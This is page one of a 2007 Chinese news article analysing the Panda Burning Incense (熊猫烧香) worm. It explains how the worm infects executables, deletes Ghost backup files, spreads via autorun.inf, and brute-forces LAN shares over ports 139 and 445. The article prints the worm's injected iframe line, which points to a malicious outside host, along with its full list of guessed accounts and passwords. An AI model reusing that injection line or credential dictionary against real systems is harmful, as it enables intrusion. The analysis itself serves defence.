|
|
千余家网络遭攻击!揭秘熊猫烧香内幕
|
| 2007-01-30 作者:INTERNET 佚名 编辑:bestfudi 【复制本帖地址】 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
这是一个传染型的DownLoad 使用Delphi编写
该病毒的主要行为:
一.传播
1.本地磁盘感染
病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行
文件遍历感染注:不感染文件大小超过10485760字节以
上的.
(病毒将不感染如下目录的文件):
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
....
(病毒将不感染文件名如下的文件):
setup.exe
NTDETECT.COM
病毒将使用两类感染方式应对不同后缀的文件名进行感染
1.二进制可执行文件(后缀后为:EXE,SCR,PIF,COM)
将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.
2.脚本类(后缀名为:htm,html,asp,php,jsp,aspx)
在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
<iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
在感染时会删除这些磁盘上的后缀名为.GHO
2.生成autorun.inf
病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成
setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联
使病毒在用户点击被感染磁盘时能被自动运行.
3.局域网传播
病毒生成随机个局域网传播线程实现如下的传播方式:
当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典
进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务
启动激活病毒.
被尝试猜测密码的账户号为:
Administrator
Guest
admin
Root
用来进行密码尝试的字典为:
1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
mein
12345678
12345
admin
5201314
qq520
1234567
123456789
654321
54321
000000
11111111
88888888
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
2002
2003
2600
alpha
111111
121212
123123
1234qwer
123abc
patrick
administrator
ator
root
****you
****
test
test123
temp
temp123
asdf
qwer
yxcv
zxcv
home
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
|
|
[第1页] [2] [第3页] |
|
|
|
|
|
【打印】【评论】【硬件论坛】【非常在线社区】【关闭】 |
|
|
|
|
|
|
|
|
|
|
|
|
首页 > 新闻频道 > 电脑新闻 > 正文